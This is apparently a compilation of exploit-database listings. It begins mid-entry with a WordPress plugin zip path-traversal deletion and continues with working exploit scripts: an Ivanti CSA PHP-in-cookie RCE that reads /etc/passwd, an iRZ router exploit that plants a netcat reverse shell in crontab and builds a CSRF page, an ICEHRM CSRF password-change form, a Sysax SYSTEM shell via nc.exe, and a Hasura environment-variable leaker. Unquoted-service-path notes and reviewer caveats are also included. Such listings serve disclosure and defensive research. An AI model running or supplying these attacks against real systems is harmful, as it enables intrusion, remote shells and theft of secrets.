cause damage by overwriting configuration files or other sensitive resources. In this finding, An attacker can exploit this vulnerability and the behavior of the extraction process, to delete an arbitrary file in the server. For doing this, it is enough to upload a zip file containing a file that is named as the path of a file which is desired to be deleted. The details of the discovery are given below. # Steps To Reproduce: 1. Install and activate the iQ Block Country plugin. 2. Create a test file in the vulnerable system: (e.g. /var/www/html/test.txt) 3. Create a zip file containing a file named as ../../../../test.txt. Absolute path at the end of this process will be: /var/www/html/wp-content/uploads/2022/01/../../../../test.txt 4. 
Go back to WordPress and visit Settings > iQ Block Country > Import/Export tab. 5. Click the “Browse” button and choose the zip file created in Step 3. 6. Click the “Restore settings” button. 7. An “Invalid file” message will appear; ignore it, the deletion already happened during extraction, before the import was rejected. Check whether test.txt has been deleted.
Ivanti Endpoint Manager 4.6 - Remote Code Execution (RCE)
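#!/bin/bash
# Exploit Title: Ivanti Endpoint Manager 4.6 - Remote Code Execution (RCE)
# Date: 20/03/2022
# Exploit Author: d7x
# Vendor Homepage: https://www.ivanti.com/
# Software Link: https://forums.ivanti.com/s/article/Customer-Update-Cloud-Service-Appliance-4-6
# Version: CSA 4.6 4.5 - EOF Aug 2021
# Tested on: Linux x86_64
# CVE : CVE-2021-44529
#
# This is the RCE exploit for the following advisory (officially discovered by Jakub Kramarz):
#   https://forums.ivanti.com/s/article/SA-2021-12-02?language=en_US
# Shoutouts to phyr3wall for providing a hint to where the obfuscated code relies
# @d7x_real
# https://d7x.promiselabs.net
# https://www.promiselabs.net
#
# Usage: ./ivanti-csa-rce.sh https://<csa-host>/client/index.php
#
# The PHP to execute travels base64-encoded in the `exec` cookie, next to the
# fixed `e=ab`, `pwn=` and `LDCSASESSID=` cookies of the original request; the
# output comes back between <c123> and </c123> in the response body. `-k`
# disables TLS verification because the appliance usually presents a
# self-signed certificate - do not reuse that flag for anything sensitive.

TARGET="${1:?usage: $0 https://<csa-host>/client/index.php}"

# run_php 'PHP code;'  -> prints whatever the target reflects back
run_php(){
  local encoded
  encoded=$(printf '%s' "$1" | base64 | tr -d '\n')
  curl -i -s -k -b "e=ab; exec=${encoded}; pwn=; LDCSASESSID=" "$TARGET" \
    | tr -d "\n" | grep -zPo '<c123>\K.*?(?=</c123>)'
  echo
}

# cat /etc/passwd  (exec=c3lzdGVtKCJjYXQgL2V0Yy9wYXNzd2QiKTs= in the original)
run_php 'system("cat /etc/passwd");'

# sleep for 10 seconds (exec=c2xlZXAoMTApOw== in the original) - a timing
# check that confirms execution even when no output is reflected
run_php 'sleep(10);'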
iRZ Mobile Router - CSRF to RCE
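# Exploit Title: iRZ Mobile Router - CSRF to RCE
# Google Dork: intitle:"iRZ Mobile Router"
# Date: 2022-03-18
# Exploit Author: Stephen Chavez & Robert Willis
# Vendor Homepage: https://en.irz.ru/
# Software Link: https://github.com/SakuraSamuraii/ez-iRZ
# Version: Routers through 2022-03-16
# Tested on: RU21, RU21w, RL21, RU41, RL01
# CVE : CVE-2022-27226
"""iRZ mobile router: authenticated crontab RCE, and a CSRF page that triggers it.

Option 1 POSTs a crontab entry to ``/api/crontab`` using HTTP Basic credentials;
the router runs the entry's ``command`` field (every minute, because every
schedule field is ``*``), which here is a netcat reverse shell.  Option 2 fills
the placeholders of ``poc.template.html`` (expected next to this script) and
writes ``poc.new.html`` for the attacker to host; a victim whose browser holds a
router session and who opens that page issues the same request themselves.

Fixes over the original listing: the crontab body is built as a dict instead
of a hand-assembled JSON string (an LHOST/LPORT containing a quote no longer
breaks the document), the HTTP response is checked, and the template path no
longer resolves to ``/poc.template.html`` when the script is run from its own
directory (``os.path.dirname(__file__)`` is ``''`` in that case).
"""
import json
import os
import subprocess  # unused in this listing; kept from the original

# Named-pipe reverse shell the router's cron will execute; {host}/{port} is
# the attacker's listener.
REVERSE_SHELL_FMT = (
    'rm /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc {host} {port} >/tmp/f'
)

# Board block the original request sent alongside "tasks"; presumably
# informational only -- TODO confirm the firmware does not validate it.
BOARD_INFO = {
    "name": "RL21",
    "platform": "irz_mt02",
    "time": "Wed Mar 16 16:43:20 UTC 2022",
}

BROWSER_UA = (
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
    "(KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36"
)


def main():
    """Print the banner and the menu, then hand off to ``runit``."""
    print("####################################################")
    print("# Welcome to IRZ CSRF to RCE Exploit - version 1.0 #")
    print("####################################################")
    print()
    print("## by RedragonX of WHG & rej_ex of SAKURA SAMURAI ##")
    print()
    print("1. Post Authentication RCE (Needs Credentials)")
    print("2. CSRF to RCE (No Credentials)")
    print()
    runit()


def runit():
    """Read the menu choice and dispatch to the matching exploit."""
    option = input("Select an option: ")
    handlers = {"1": exploit1, "2": exploit2}
    handler = handlers.get(option)
    if handler is None:
        print("You must select '1' or '2'. Exiting.")
        return
    handler()


def _ask_port():
    """Prompt for the router's web port; an empty answer means 80."""
    return int(input("## Enter the victim router web page port (default is 80): ") or "80")


def exploit1():
    """Interactive post-auth RCE: collect target, credentials and listener, then fire."""
    print("## Running Post Auth RCE exploit")
    print()
    print()
    router_ip = input("## Enter the router ip to exploit: ")
    router_port = _ask_port()
    router_user = input("## Enter the username for the router login: ")
    router_pass = input("## Enter the password for the router login: ")
    LHOST = input("## Enter the LHOST for the router reverse shell: ")
    LPORT = input("## Enter the LPORT for the router reverse shell: ")
    router_url = f'http://{router_ip}:{router_port}'
    nc1_str = f'Start a listener with the following command: nc -lvp {LPORT}'
    input(nc1_str + "\n\nPress enter once you do")
    send_json_payload(router_url, router_user, router_pass, LHOST, LPORT)


def build_crontab_payload(lhost_ip, lhost_port):
    """Return the JSON body for ``POST /api/crontab`` that installs the reverse shell.

    Every schedule field is ``*``, so the router runs the command once a minute.
    The body is a dict so that ``requests`` serialises it; quotes or backslashes
    in *lhost_ip*/*lhost_port* can no longer corrupt the document.
    """
    command = REVERSE_SHELL_FMT.format(host=lhost_ip, port=lhost_port)
    return {
        "tasks": [
            {
                "enable": True,
                "minutes": "*",
                "hours": "*",
                "days": "*",
                "months": "*",
                "weekdays": "*",
                "command": command,
            }
        ],
        "_board": dict(BOARD_INFO),
    }


def send_json_payload(router_url, router_user, router_pass, lhost_ip, lhost_port):
    """Install the reverse-shell cron job over HTTP Basic auth and brief the operator.

    A non-2xx answer is reported instead of silently waiting: a wrong password
    or a fixed firmware otherwise looks exactly like "no shell yet".
    """
    import requests  # lazy: the pure helpers above work without requests installed

    print(f'Sending the payload to {router_url}\n')
    session = requests.Session()
    session.auth = (router_user, router_pass)
    session.headers.update({
        "User-Agent": BROWSER_UA,
        "X-Requested-With": "XMLHttpRequest",
        "Origin": router_url,
        "Referer": router_url,
    })
    response = session.post(
        router_url + "/api/crontab",
        json=build_crontab_payload(lhost_ip, lhost_port),
    )
    if not response.ok:
        print(f"Router answered HTTP {response.status_code}; the cron job may not have been installed.")
    # The first shell is torn down when cron re-runs the job (it starts with
    # "rm /tmp/f"), so the operator is told to re-launch on a second port.
    exploit_str = REVERSE_SHELL_FMT.format(host=lhost_ip, port=443)
    print(
        "Request sent! You may have to wait about 2 minutes to get a shell. \n"
        "First shell will die due to crontab job. Start a new listener on a new port "
        "[e.g. 443], and run the following command: " + exploit_str
    )
    print("To fix TTY: type telnet 0.0.0.0 in the shell")


def exploit2():
    """Interactive CSRF path: collect target and listener, then render the PoC page."""
    print("## Running CSRF to RCE exploit")
    print()
    print()
    router_ip = input("## Enter the router ip to exploit: ")
    router_port = _ask_port()
    LHOST = input("## Enter the LHOST for the router reverse shell: ")
    LPORT = input("## Enter the LPORT for the router reverse shell: ")
    load_csrf_poc_file(router_ip, router_port, LHOST, LPORT)


def _ipv4_octets(addr):
    """Return the four octets of a dotted-quad *addr* as strings, or None if it is not one."""
    parts = addr.split(".")
    if len(parts) != 4:
        return None
    if not all(part.isdigit() and 0 <= int(part) <= 255 for part in parts):
        return None
    return parts


def render_poc(template, router_ip, router_port, lhost_ip, lhost_port):
    """Fill the placeholders of ``poc.template.html`` and return the HTML.

    Placeholders are spelled exactly as in the template (including "octect"):
    ``{router_ip}``, ``{router_port}``, ``{lhost_ip_octect_1}``..``_4`` and
    ``{lhost_port}``.  Returns None when *lhost_ip* is not a dotted-quad IPv4
    address, because the template needs the octets individually.
    """
    octets = _ipv4_octets(lhost_ip)
    if octets is None:
        return None
    substitutions = {
        "{router_ip}": router_ip,
        "{router_port}": str(router_port),
        "{lhost_port}": str(lhost_port),
    }
    for index, octet in enumerate(octets, start=1):
        substitutions[f"{{lhost_ip_octect_{index}}}"] = octet
    html = template
    for placeholder, value in substitutions.items():
        html = html.replace(placeholder, value)
    return html


def load_csrf_poc_file(router_ip, router_port, lhost_ip, lhost_port):
    """Read ``poc.template.html`` next to this script and write the filled ``poc.new.html``.

    Both paths are anchored on the script's absolute directory so running
    ``python script.py`` from inside that directory works.
    """
    script_dir = os.path.dirname(os.path.abspath(__file__))
    file_path = os.path.join(script_dir, "poc.template.html")
    if not os.path.isfile(file_path):
        print(f'{file_path} not found')
        return
    with open(file_path) as poc_file:
        template = poc_file.read()
    new_html = render_poc(template, router_ip, router_port, lhost_ip, lhost_port)
    if new_html is None:
        print(f'{lhost_ip} is not a proper IPV4 address.')
        return
    new_file_path = os.path.join(script_dir, "poc.new.html")
    try:
        with open(new_file_path, 'w') as new_file:
            new_file.write(new_html)
    except OSError as exc:
        # Permission or path problems; the original only caught FileNotFoundError.
        print(f"You had an error writing to the file: {exc}")
        return
    print()
    print(f'New file written to {new_file_path}. Host this file')


if __name__ == "__main__":
    main()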
-
ICEHRM 31.0.0.0S - Cross-site Request Forgery (CSRF) to Account Takeover
# Exploit Title: ICEHRM 31.0.0.0S - Cross-site Request Forgery (CSRF) to Account Takeover # Date: 18/03/2022 # Exploit Author: Devansh Bordia # Vendor Homepage: https://icehrm.com/ # Software Link: https://github.com/gamonoid/icehrm/releases/tag/v31.0.0.OS # Version: 31.0.0.OS # Tested on: Windows 10 1. About - ICEHRM The IceHrm employee management system allows companies to centralize confidential employee information and define access permissions for authorized personnel, so that employee information is both secure and accessible. 2. Description: The application's update-password feature is vulnerable to CSRF: the password change is performed by a plain GET request with no anti-CSRF token, so a page controlled by the attacker can trigger it from a logged-in victim's browser (a GET can be fired by a simple link or image tag, not only by the form below) and set a password the attacker chooses, leading to account takeover. Caveat: the request in section 4 also carries the victim's *current* password in the `req` JSON (`"current":...`); unless the server ignores that field, the attacker must already know it, which narrows the practical impact -- confirm server-side handling of `current` before rating this as a full takeover. 3. Steps To Reproduce: - Using the application's Admin user, create a user (e.g. "Gaurav") with the Employee permission and set his password. - Log in to the application with that user's credentials and navigate to the Update Password feature to change the password. - Intercept the request in a proxy: the password change is a GET request and no CSRF token is used. - Using Burp Suite, generate a CSRF PoC and save it as exploit.html. - Change the `pwd` value in the PoC to any password you want. - Open this PoC in the same browser session and click the submit button. - When you next try to log in, the password for the account has been reset, i.e. the account is taken over. 4.
Vulnerable Request: GET /app/service.php?t=Employee&a=ca&sa=changePassword&mod=modules=employees&req={"current":"Test@123 ","pwd":"Dummy@123"} HTTP/1.1 Host: localhost:8070 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0 Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Referer: http://localhost:8070/app/?g=modules&n=employees&m=module_Personal_Information Cookie: PHPSESSID=k8d27ve456j0jb56ga885j1vvb Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin 5. Exploit POC (exploit.html) Note: the JSON inside the `req` attribute must be HTML-escaped (`&quot;`); with raw double quotes, as in the original copy, the browser cuts the attribute value at the first `"` and the request carries only `req={`, so the password change never happens. <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <script>history.pushState('', '', '/')</script> <form action="http://localhost:8070/app/service.php"> <input type="hidden" name="t" value="Employee" /> <input type="hidden" name="a" value="ca" /> <input type="hidden" name="sa" value="changePassword" /> <input type="hidden" name="mod" value="modules=employees" /> <input type="hidden" name="req" value="{&quot;current&quot;:&quot;Test@123&quot;,&quot;pwd&quot;:&quot;Dummy@123&quot;}" /> <input type="submit" value="Submit request" /> </form> </body> </html>
-
Sysax FTP Automation 6.9.0 - Privilege Escalation
# Exploit Author: bzyo (@bzyo_) # Exploit Title: Sysax FTP Automation 6.9.0 - Privilege Escalation # Date: 03-20-2022 # Vulnerable Software: Sysax FTP Automation 6.9.0 # Vendor Homepage: https://www.sysax.com/ # Version: 6.9.0 # Software Link: https://www.sysax.com/download/sysaxauto_setup.msi # Tested on: Windows 10 x64 # Details: The Sysax Scheduler Service runs as Local System. By default the application lets low-privileged users create and run scheduled/triggered tasks. When the option to run the task as the current user (or another specified user) is unchecked, the scheduler service executes the task itself, i.e. as Local System. A low-privileged local user can therefore run an arbitrary program as SYSTEM. # Prerequisites: To exploit this, an attacker must already have local access, as a low-privileged user, to a system running Sysax FTP Automation. # Exploit: Logged in as the low-privileged account 1. Create folder c:\temp 2. Download netcat (nc.exe) to c:\temp (note: nc.exe is commonly flagged by antivirus; any command in pwn.bat works, the netcat shell is only a convenient proof) 3. Create file 'pwn.bat' in c:\temp with contents c:\temp\nc.exe localhost 1337 -e cmd 4. Open a command prompt and start a netcat listener: nc -nlvvp 1337 5. Open sysaxschedscp.exe from C:\Program Files (x86)\SysaxAutomation 6. Select Setup Scheduled/Triggered Tasks - Add task (Triggered) - Set the folder to monitor to c:\temp - Check 'Run task if a file is added to the monitor folder or subfolder(s)' - Choose 'Run any other Program' and select c:\temp\pwn.bat - Uncheck 'Login as the following user to run task' - Finish and Save 7. Create a new text file in c:\temp 8. Check the netcat listener C:\WINDOWS\system32>whoami whoami nt authority\system
-
Cloudflare WARP 1.4 - Unquoted Service Path
# Exploit Title: Cloudflare WARP 1.4 - Unquoted Service Path # Date: 05/03/2022 # Exploit Author: Hejap Zairy # Vendor Homepage: https://www.cloudflare.com/ # Software Link: https://developers.cloudflare.com/warp-client/get-started/windows/ # Version: 1.4.107 # Tested: Windows 10 Pro x64 es C:\Users\Hejap>sc qc CloudflareWARP [SC] QueryServiceConfig SUCCESS SERVICE_NAME: CloudflareWARP TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files\Cloudflare\Cloudflare WARP\\warp-svc.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Cloudflare WARP DEPENDENCIES : wlansvc SERVICE_START_NAME : LocalSystem #Exploit: BINARY_PATH_NAME above is not quoted and contains spaces, so when the service starts Windows may try `C:\Program.exe` and `C:\Program Files\Cloudflare\Cloudflare.exe` before reaching warp-svc.exe. A successful attack requires the local user to be able to place an executable at one of those locations (i.e. write access to `C:\` or `C:\Program Files\Cloudflare\`) without being detected by the OS or other security software; the planted binary would then run as LocalSystem at service start or reboot. Default Windows ACLs do not grant standard users write access to those directories, so check them with `icacls` before claiming this is exploitable on a given host.
-
Private Internet Access 3.3 - 'pia-service' Unquoted Service Path
# Exploit Title: Private Internet Access 3.3 - 'pia-service' Unquoted Service Path # Date: 04/03/2022 # Exploit Author: Saud Alenazi # Vendor Homepage: https://www.privateinternetaccess.com # Software Link: https://www.privateinternetaccess.com/download # Version: 3.3.0.100 # Tested: Windows 10 x64 # Contact: https://twitter.com/dmaral3noz # Step to discover Unquoted Service Path: C:\Users\saudh>wmic service where 'name like "%PrivateInternetAccessService%"' get name, displayname, pathname, startmode, startname DisplayName Name PathName StartMode StartName Private Internet Access Service PrivateInternetAccessService "C:\Program Files\Private Internet Access\pia-service.exe" Auto LocalSystem # Service info: C:\Users\saudh>sc qc PrivateInternetAccessService [SC] QueryServiceConfig SUCCESS SERVICE_NAME: PrivateInternetAccessService TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : "C:\Program Files\Private Internet Access\pia-service.exe" LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Private Internet Access Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem #Exploit: A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application. Reviewer note: both the wmic and the sc outputs above show BINARY_PATH_NAME already enclosed in double quotes. A quoted path is not subject to the unquoted-service-path executable search, so as recorded here the described attack does not apply; re-check the `sc qc` output on the affected version (and the directory ACLs with `icacls`) before treating this as exploitable.
-
Hasura GraphQL 2.2.0 - Information Disclosure
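# Exploit Title: Hasura GraphQL 2.2.0 - Information Disclosure
# Software: Hasura GraphQL Community
# Software Link: https://github.com/hasura/graphql-engine
# Version: 2.2.0
# Exploit Author: Dolev Farhi
# Date: 5/05/2022
# Tested on: Ubuntu
"""Read environment variables of the Hasura engine process through ``/v1/metadata``.

``add_remote_schema`` accepts ``url_from_env``; the engine resolves the named
variable and parses its value as a URI.  When parsing fails, the error message
echoes the raw value back after ``not a valid URI:``, which this script harvests.

Two cases the original listing did not handle:

* a value that *is* a valid URI produces no ``error`` key -- the remote schema
  named ``ttt`` is actually created on the target (the original crashed with a
  KeyError here); the value is not leaked and the schema should be removed
  again with ``remove_remote_schema``;
* an engine that enforces an admin secret rejects the request; export
  ``HASURA_ADMIN_SECRET`` in this script's environment to send it along.
"""
import os

SERVER_ADDR = 'x.x.x.x'
REMOTE_SCHEMA_NAME = 'ttt'
# Substring of the engine's error message that precedes the echoed value.
URI_ERROR_MARKER = 'not a valid URI:'


def build_payload(env_var):
    """Return the bulk metadata body that references *env_var* through ``url_from_env``."""
    return {
        "type": "bulk",
        "source": "",
        "args": [
            {
                "type": "add_remote_schema",
                "args": {
                    "name": REMOTE_SCHEMA_NAME,
                    "definition": {
                        "timeout_seconds": 60,
                        "forward_client_headers": False,
                        "headers": [],
                        "url_from_env": env_var,
                    },
                    "comment": "",
                },
            }
        ],
        "resource_version": 2,
    }


def extract_value(body):
    """Classify a decoded ``/v1/metadata`` response.

    Returns ``(value, note)``: *value* is the leaked variable content when the
    error message contains ``URI_ERROR_MARKER``, else None; *note* explains the
    other outcomes (an error without the marker, or a success response, which
    means the schema was created and the value is a valid URI).
    """
    error = body.get('error') if isinstance(body, dict) else None
    if error is None:
        return None, (
            f"No error returned: the value is a valid URI and remote schema "
            f"'{REMOTE_SCHEMA_NAME}' was created on the target -- remove it with "
            f"remove_remote_schema. Response: {body}"
        )
    _, marker, rest = str(error).partition(URI_ERROR_MARKER)
    if not marker:
        return None, f'Could not parse out VAR, dumping error as is\n{error}'
    return rest.strip(), ''


def main():
    """Prompt for variable names in a loop and print whatever the engine echoes back."""
    import requests  # lazy: the pure helpers above work without requests installed

    url = 'http://{}/v1/metadata'.format(SERVER_ADDR)
    headers = {}
    admin_secret = os.environ.get('HASURA_ADMIN_SECRET')
    if admin_secret:
        headers['x-hasura-admin-secret'] = admin_secret
    print('Hasura GraphQL Community 2.2.0 - Arbitrary Root Environment Variables Read')
    while True:
        try:
            env_var = input('Type environment variable key to leak.\n> ')
        except (EOFError, KeyboardInterrupt):
            print()
            return
        if not env_var:
            continue
        response = requests.post(url, json=build_payload(env_var), headers=headers)
        try:
            body = response.json()
        except ValueError:
            # Proxies and error pages answer with HTML; show it instead of crashing.
            print(f'Non-JSON response (HTTP {response.status_code}): {response.text[:500]}')
            continue
        value, note = extract_value(body)
        print(value if value is not None else note)


if __name__ == "__main__":
    main()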